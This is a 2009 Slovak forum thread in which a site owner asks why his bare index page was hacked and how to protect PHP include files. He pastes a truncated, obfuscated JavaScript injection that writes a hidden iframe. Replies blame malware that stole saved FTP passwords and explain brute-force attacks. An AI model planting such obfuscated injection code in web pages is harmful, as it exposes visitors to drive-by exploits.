[ Príspevkov: 8 ] 
AutorSpráva
Offline

Užívateľ
Užívateľ
Obrázok užívateľa

Registrovaný: 21.09.08
Prihlásený: 14.11.17
Príspevky: 225
Témy: 74 | 74
Bydlisko: Michalovce
NapísalOffline : 06.02.2009 11:19 | Hack stranky

Nazdarek. Chcem sa opytat na par veci.

1. Mam spravenu indexovu stranku, na ktorej nie je vôbec nic, iba nazov stranky..cize ziadny odkaz, ziadny formular..nic. V jednoduchost asi toto:
Kód:
<html>
<body color: black>
<span style=' font-size: 24px; font-weight: bold; font-family: Tahoma, Verdana, Arial; color: green '>www.nazov stranky.sk</span>
</body>
</html>

Nic viac.. Ako je mozne ze mi to hackli...Teda, pri nacitavani mi vypise, ze taha data z nejakej stranky tusim imprerator.ru. A po nacitani sa mi zapne nacitavanie Acrobat Readeru, no skor ako ukonci nacitanie Acrobatu,tak mi vyhodi nejake varovne okienko. Ked som si pozrel zdrojovy kod tej stranky, tak som tam na moje prekvapenie nasiel nieco take:


Kód:
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>www.nazovstranky.sk</title>
<meta http-equiv="content-type" content="text/html; charset=windows-1250" >
<meta http-equiv="content-language" content="en" >
<meta name="description" content="Only4Web.com" >
<meta name="robots" content="all,follow" >
</head>
<body bottomMargin="0" bgcolor="black" leftMargin="0" topMargin="220" marginheight="0"
marginwidth="0" text-align="center"><!-- ad --><SCRIPT TYPE="text/javascript" LANGUAGE="JavaScript1.2">document.write(unescape('')+String.fromCharCode(60)+String.fromCharCode(105)+''+'fr'+unescape('%61%6D')+'e'+String.fromCharCode(32)+String.fromCharCode(105)+String.fromCharCode(100)+''+unescape('%3D%22%62')+String.fromCharCode(53)+String.fromCharCode(51)+String.fromCharCode(55)+''+unescape('%65%38%37%66')+unescape('%31%64%62')+'fafe'+unescape('%66%62')+unescape('%38%62%62%37')+...pokracuje to dalej..

Ako to mam osetrit, aby mi to nehackli???

2. Ako mam osetrit subor, ktory je includovany v index.php?? Mam teraz na mysli subor v ktorom mam ulozene len funkcie s nazvom napr. funkcie.php . V subore index.php ho mam zapisany takto:
Kód:
require "./funkcie.php";

Je nutne takyto subor vobec nejako este osetrovat proti nejakemu "vniknutiu", alebo je to zbytocne?? Ako to mate osetrene vy??

3. Par krat som sa uz na tomto fore stretol s vyrazom "brute force". S prispevkov som pochopil ze sa jedna o utok na DB, ale zaujimalo by ma to trocha viac. Cize o co presne go a ako sa predtym chranit?? Nevysvetlili by ste mi to niekto alebo hodili by ste mi nejaky link??

Viem ze je tu uz na nieco podobne tema .. myslim to bola : Ochrana PHP skriptov a vy , ale nejako som v tom nenasiel konkretne odpovede na moje otazky.. Mozno tam aj su, len som to asi nepochopil. :loony:


Offline

Skúsený užívateľ
Skúsený užívateľ
Hack stranky

Registrovaný: 09.07.08
Prihlásený: 17.01.15
Príspevky: 1586
Témy: 96 | 96
NapísalOffline : 06.02.2009 22:00 | Hack stranky

načo máš funkcie.php keď php ani nevyužívaš? Či to niekde inde?
Čo heslo? Nemáš náhodou na ftp napríklad meno "user" a heslo "user"?

Inak, odporúčal by som ti zbehnúť aspoň troma antivirákmi comp. Stavím sa, že ti to chcelo naservírovať nejaký exploit pomocou diery v adobe acrobat readeri.
Ten škaredý skript ti vytvorí iframe. Inak divím sa, že to ešte niekto používa takto, toto je trošku zastaralý spôsob by som povedal :-)

// tá tvoja stránka je už nahlásená ako škodlivá :D Teda ak máš onlyforweb.com.
Okrem toho čo som napísal, snaží sa ešte zmenšiť okno prehliadača na čo najmenšiu veľkosť a robí to každé tri sekundy (300000 v setInterval)


_________________
neříkejte, že něco nejde udělat, protože se vždycky najde nějaký blbec, co neví, že to nejde – a udělá to!
Offline

Užívateľ
Užívateľ
Hack stranky

Registrovaný: 26.12.06
Prihlásený: 30.10.17
Príspevky: 4009
Témy: 181 | 181
Bydlisko: Nitra / Bra...
Vek: 24
NapísalOffline : 06.02.2009 22:20 | Hack stranky

toto som mal aj ja... vkladalo mi skodlivy kod do suborov s nazvom index.php, index.html na vsetkych FTP co som mal v totalcommanderi... prebehni pocitac nodom, zmen hesla na ftp a bude to ok


_________________
Sorry za prelkepy
Offline

Užívateľ
Užívateľ
Obrázok užívateľa

Registrovaný: 21.09.08
Prihlásený: 14.11.17
Príspevky: 225
Témy: 74 | 74
Bydlisko: Michalovce
Napísal autor témyOffline : 07.02.2009 9:43 | Hack stranky

Dik za odpovede..
rooobertek .. Dik za odpoved, vazim si to, ale fakt si myslis, ze by som pouzival niekde prihlas. meno a heslo rovnake??? :shock: Ten subor funkcie.php pouzivam inde

emer ...Presne toto mi to robi..Vklada mi to skodlivy kod do vsetkych index-ovych suborov..
Takze ak som to spravne pochopil, tak nejde o hack, ale skor o virus v mojom PC??
A co dalsie moje otazocky?? Odpoviete mi na nich?? Ako chranit take subory a co je to ta metoda Brute Force??


Offline

Skúsený užívateľ
Skúsený užívateľ
Hack stranky

Registrovaný: 09.07.08
Prihlásený: 17.01.15
Príspevky: 1586
Témy: 96 | 96
NapísalOffline : 07.02.2009 10:20 | Hack stranky

No podľa emerovej skúsenosti to vyzerá na to, že by si nemal ukladať heslá. Nikdy heslá neukladaj, to sa nevypláca.
Brute force je o tom, že robot skúša rozlúsknuť tvoje heslo. Najjednoduchšie je rozlúsknuť heslá, ktoré sa nachádzajú v slovníku - anglickom, slovenskom alebo inom. Potom sú ľahko rozlúštiteľné krátke heslá. Čím nezmyselnejšie a dlhšie heslo, tým ťažšie sa brute-forcuje :) Môj rekord bol 34 znakov dlhé heslo skladajúce sa z malých a veľkým písmen, čísel a znakov. Ale to sa tiež ťažko pamätá....
No ale aj tak ti to nepomôže, ak máš v compe nejaký keylogger. To má potom útočník k dispozícii všetko, čo píšeš.


_________________
neříkejte, že něco nejde udělat, protože se vždycky najde nějaký blbec, co neví, že to nejde – a udělá to!
Offline

Užívateľ
Užívateľ
Obrázok užívateľa

Registrovaný: 21.09.08
Prihlásený: 14.11.17
Príspevky: 225
Témy: 74 | 74
Bydlisko: Michalovce
Napísal autor témyOffline : 07.02.2009 11:51 | Hack stranky

OK. THX..K tomu keyloggeru..Najde ho aj klasicky antivirak napr. NOD32, alebo na to treba nejaky iny program??
A este k tym samotnym suborom resp. funkcie.php . Treba to nejak zvlast osetrovat a ak ano, tak aka je najlepsia metoda?? :loony:


Offline

Skúsený užívateľ
Skúsený užívateľ
Hack stranky

Registrovaný: 09.07.08
Prihlásený: 17.01.15
Príspevky: 1586
Témy: 96 | 96
NapísalOffline : 07.02.2009 15:00 | Hack stranky

Ošetrovať treba, najlepšia metóda je naučiť sa všetko o bezpečnosti a podľa toho robiť kód :D je toho naozaj veľa, načo treba myslieť


_________________
neříkejte, že něco nejde udělat, protože se vždycky najde nějaký blbec, co neví, že to nejde – a udělá to!
Offline

Užívateľ
Užívateľ
Hack stranky

Registrovaný: 07.08.06
Prihlásený: 05.12.17
Príspevky: 919
Témy: 259 | 259
Bydlisko: Levice
NapísalOffline : 08.02.2009 18:58 | Hack stranky

prva zasada, na ktoru som aj ja raz doplatil je - nikdy si nenechavaj zapisane heslo v Total Commanderi.... meno si nechaj a heslo si pis pri kazdom spojeni ftp - ak teda pouzivas TC...

ostatne veci - suhlasim s predchodzimi prispevkami.

A pri inkludovani suborov ja pouzivam toto: v subore definujes hned na zaciatku taketo nieco
Kód:
define('subor', true);


a v tom subore, ktory budes includovat das kontrolu na zaciatok
Kód:
if (!defined('subor')) {die("Nemáte povolený prístup na túto stránku !");}?>


to ti vsak len zaisti, ze includovana stranka bude funkcna jedine v tom subore, kam ho chces inkludovat..

Ostatne sposoby ochrany skus vygooglit....


 [ Príspevkov: 8 ] 


Hack stranky



Podobné témy

 Témy  Odpovede  Zobrazenia  Posledný príspevok 
V tomto fóre nie sú ďalšie neprečítané témy.

alterIW hack

v Antivíry a antispywary

9

416

12.05.2011 21:18

ioLo+

V tomto fóre nie sú ďalšie neprečítané témy.

hack routra

v Siete

2

402

10.02.2009 11:01

zmija31

V tomto fóre nie sú ďalšie neprečítané témy.

hack PHPBB

v Redakčné systémy

11

2665

25.10.2008 16:10

Ďuri

V tomto fóre nie sú ďalšie neprečítané témy.

Hack webu

v Ostatné

5

515

21.03.2011 21:13

coldak

V tomto fóre nie sú ďalšie neprečítané témy.

Report Post Hack

v Redakčné systémy

2

691

02.08.2006 20:35

rEnEeK

V tomto fóre nie sú ďalšie neprečítané témy.

hack- používane názvy

v PHP, ASP

16

855

03.05.2009 18:32

lolko

V tomto fóre nie sú ďalšie neprečítané témy.

ModCP Merge Hack

v Redakčné systémy

0

503

13.10.2006 9:17

JanoF

V tomto fóre nie sú ďalšie neprečítané témy.

Hack sav.sas.sk

v Novinky

6

505

27.08.2008 12:17

wolf14

V tomto fóre nie sú ďalšie neprečítané témy.

PREKLAD: Shop Hack CZ

v Redakčné systémy

0

2771

29.01.2007 16:12

JanoF

V tomto fóre nie sú ďalšie neprečítané témy.

Report post hack error

v Redakčné systémy

10

1454

13.02.2008 14:30

Risho_rk

V tomto fóre nie sú ďalšie neprečítané témy.

AIO Wif Hack 2010

v Ostatné programy

0

221

18.07.2010 11:02

jansu

V tomto fóre nie sú ďalšie neprečítané témy.

hack pre IE v CSS

v HTML, XHTML, XML, CSS

13

911

03.04.2009 10:12

Flety

V tomto fóre nie sú ďalšie neprečítané témy.

PREKLAD: News Block Hack SK

v Redakčné systémy

0

2131

12.11.2006 17:20

JanoF

V tomto fóre nie sú ďalšie neprečítané témy.

PREKLAD: Advanced Report Hack SK

v Redakčné systémy

0

1977

24.02.2007 12:59

JanoF

V tomto fóre nie sú ďalšie neprečítané témy.

Hladam mod - ako footer hack

v Redakčné systémy

2

313

22.10.2006 16:29

WEB LAMA

V tomto fóre nie sú ďalšie neprečítané témy.

PREKLAD: Advanced Report Hack SK

v Redakčné systémy

2

2342

04.04.2008 16:13

Gerky



© 2005 - 2017 PCforum, edited by JanoF